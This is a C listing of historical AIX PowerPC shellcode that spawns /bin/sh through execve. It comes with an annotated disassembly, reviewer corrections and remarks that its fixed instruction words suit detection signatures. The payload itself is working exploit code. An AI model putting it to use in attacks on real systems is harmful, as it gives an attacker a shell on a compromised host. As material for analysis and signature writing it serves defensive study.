Aix execve /bin/sh 88 bytes
/*
 * AIX
 * execve() of /bin/sh Georgi Guninski (guninski@hotmail.com)
 *
 * code[] holds 22 POWER/PowerPC instruction words (88 bytes), one per
 * array element, followed by a single 0 word.
 *
 * What the listed instructions do:
 *   - open a 1104-byte stack frame and store LR at 1112(SP);
 *   - build two 32-bit constants and park them at 1088(SP) and 1092(SP);
 *   - build the bytes "/bin/sh" plus a terminating zero at 1080(SP);
 *   - point r3 at that string, clear r4, reload the two constants into
 *     RTOC and CTR, and branch through CTR.
 *
 * Review notes:
 *   - 0xf0192c48 (ends up in RTOC) and 0xd0024c0c (ends up in CTR) are
 *     absolute addresses baked into the immediates. Presumably they are
 *     the TOC value and entry point of execve() in the shared libc of
 *     the author's AIX level; the listing itself does not say which
 *     level, so treat that as unconfirmed.
 *   - Because those addresses and the string halves are fixed, the
 *     instruction words are constant from copy to copy (for example the
 *     cau/oril pairs carrying 0x2f62/0x696e and 0x2f73/0x6801), which
 *     makes them stable material for content signatures.
 */

unsigned int code[]={
 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
 0x7c0903a6 , 0x4e800420, 0x0
};

/* disassembly
 *
 * NOTE(review): the listing as published printed the four 0x6063xxxx
 * words and 0x30610438 as "lis". Primary opcode 24 is OR-immediate
 * (POWER oril / PowerPC ori) and primary opcode 12 is add-immediate-
 * carrying (POWER ai / PowerPC addic), so they are shown that way below.
 * The published "CTR" and "TOC" tags were also attached to the opposite
 * constants from the registers they are finally loaded into; the tags
 * below follow the lwz/mtspr instructions near the end of the sequence.

 7c0802a6 mfspr r0,LR
 9421fbb0 stu SP,-1104(SP) --get stack
 90010458 st r0,1112(SP)   --LR saved; no listed instruction reloads it
 3c60f019 cau r3,r0,0xf019 --upper half of the RTOC value
 60632c48 oril r3,r3,11336 --lower half: r3 = 0xf0192c48
 90610440 st r3,1088(SP)
 3c60d002 cau r3,r0,0xd002 --upper half of the CTR (branch target) value
 60634c0c oril r3,r3,19468 --lower half: r3 = 0xd0024c0c
 90610444 st r3,1092(SP)
 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
 6063696e oril r3,r3,26990 --r3 = 0x2f62696e, the bytes "/bin"
 90610438 st r3,1080(SP)
 3c602f73 cau r3,r0,0x2f73
 60636801 oril r3,r3,26625 --r3 = 0x2f736801, the bytes "/sh" then 0x01
 3863ffff addi r3,r3,-1    --0x2f736801 - 1 = 0x2f736800
 9061043c st r3,1084(SP) --terminate with 0
 30610438 ai r3,SP,1080    --r3 = address of the string built above
 7c842278 xor r4,r4,r4 --argv=NULL
 80410440 lwz RTOC,1088(SP) --RTOC = 0xf0192c48
 80010444 lwz r0,1092(SP)   --r0 = 0xd0024c0c
 7c0903a6 mtspr CTR,r0
 4e800420 bctr --jump
*/
